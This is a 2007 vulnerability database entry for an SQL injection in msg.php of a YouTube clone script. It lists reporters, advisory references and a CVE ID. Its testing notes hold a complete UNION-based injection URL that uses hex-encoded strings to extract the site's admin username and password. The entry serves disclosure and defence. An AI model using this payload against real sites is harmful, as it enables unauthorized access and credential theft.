Youtube Clone Script msg.php id Variable SQL Injection

2007-07-02T18:07:45
ID OSVDB:36328
Type osvdb
Reporter xprog(), t0pP8uZz()
Modified 2007-07-02T18:07:45

Description

Manual Testing Notes

http://[target]/path/msg.php?id=-1//UNION//ALL//SELECT//1,0x7430705038755A7A20616E64207870726F67206F776E616765,convert(concat((SELECT//svalue//from//sconfig//where//soption=0x61646D696E5F6E616D65),0x3a,(SELECT//svalue//from//sconfig//where//soption=0x61646D696E5F70617373))//using//latin1),4,5,6,7,8,9/*

References:

Secunia Advisory ID:25922 Other Advisory URL: http://milw0rm.com/exploits/4136 Keyword: youtubeclone ISS X-Force ID: 35192 FrSIRT Advisory: ADV-2007-2400 CVE-2007-3518 Bugtraq ID: 24720